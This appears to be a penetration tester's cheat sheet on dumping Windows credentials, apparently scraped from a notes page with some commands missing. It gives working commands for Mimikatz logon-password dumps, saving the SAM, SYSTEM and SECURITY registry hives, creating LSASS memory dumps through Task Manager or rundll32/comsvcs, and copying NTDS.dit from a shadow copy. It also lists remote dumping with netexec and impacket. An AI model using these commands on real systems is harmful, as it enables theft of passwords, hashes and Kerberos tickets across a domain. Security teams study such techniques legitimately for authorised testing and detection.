Credential Dumping
Locally
Mimikatz
Dump all
Output to file with log.\mimikatz.exe "log C:\path\to\mimikatz.log" "privilege::debug" "sekurlsa::logonpasswords" "log" "exit"
Rubeus
Kerberos Tickets
List cached tickets - Non elevated: List current users - Elevated: List everyones
Specify service Dump tickets - Non elevated: dump current users Dump all tickets by targeting krbtgt (Elevated)Alternative Methods
Save SAM and SYSTEM/SECURITY, extract locally
note
we will only need hklm\sam & hklm\system, but hklm\security can also be helpful to save as it can contain hashes associated with cached domain user account credentials present on domain-joined hosts
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
GUI access required
Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file **A file called lsass.DMP is created and saved in:
Rundll32.exe & Comsvcs.dll Method
Will absolutely be flagged by AV/EDR
Get lsass PID
Create dumpfile with rundll32With this command, we are running rundll32.exe to call an exported function of comsvcs.dll which also calls the MiniDumpWriteDump (MiniDump) function to dump the LSASS process memory to a specified directory (C:\lsass.dmp).
Use Pypykatz to Extract Credentials (on attack box)
NTDS.dit Dumping
(Need DA or local admin on DC) Shadow Copy
Copying NTDS.dit from the VSScmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
Remotely
netexec
LSA (local admin required)
SAM (local admin required) NTDS (DA or local admin on DC required)impacket
Dump everything (local admin required)